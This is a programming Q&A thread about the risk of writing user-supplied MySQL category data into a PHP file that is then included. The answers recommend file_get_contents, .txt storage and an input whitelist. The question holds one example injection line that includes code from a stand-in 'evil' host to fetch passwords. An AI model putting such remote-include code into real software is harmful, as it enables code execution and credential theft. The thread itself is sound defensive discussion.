# Php. User can write data in a file and i include the file

Tags: php, mysql

User writes categories (`name`, `url`) in mysql.

On each write/change `name` and `url` I plan to write also in txt or php file on a server. With aim on each page re/load instead of connecting to mysql, just to include the txt or php file.

Now i imagine a situation. For example, user as `name` of category writes something `include("http://www.evil/get-passwords.php");` So in txt or php file I may have such code and when include in php the code will execute?

How to prevent such situation? To allow only certain characters to use for name of a category?

Comment: 1) There is NO NEED to not connect to DB. Hardware requirements for DB connection are minimal and negligible.

Comment: 2) And if you still want to, whatever, look into triggers and how to select into outfile in mysql.

Comment: 3) How to read data in PHP and not to get recked by wannabe hackers? learn PHP basics.

Comment: `include` is not the only function in PHP that can read data from a file

Answer (score 3):

I would not recommend to use `include` for situations like that at all. You may have a look at http://php.net/manual/en/function.file-get-contents.php

Using `file_get_contents` you are able to avoid script injection, since it reads the file as a pure string.

Answer (score 1):

Do you plan to let users write into `.php` file? That is not a very good idea.
If you really need this, let them write in simple `.txt` files (and double check that apache will not parse `txt` as `php`).

For sanitization, the common apporach is to write an allowed list (white-list):

```
   $allowedName = array(
      'name1',
      'name2',
      'name3'
      // ...
   );
```

Then when user input you can check it:

```
   if (!in_array($_POST['userName'], $allowedName))
     die('Not Allowed');
```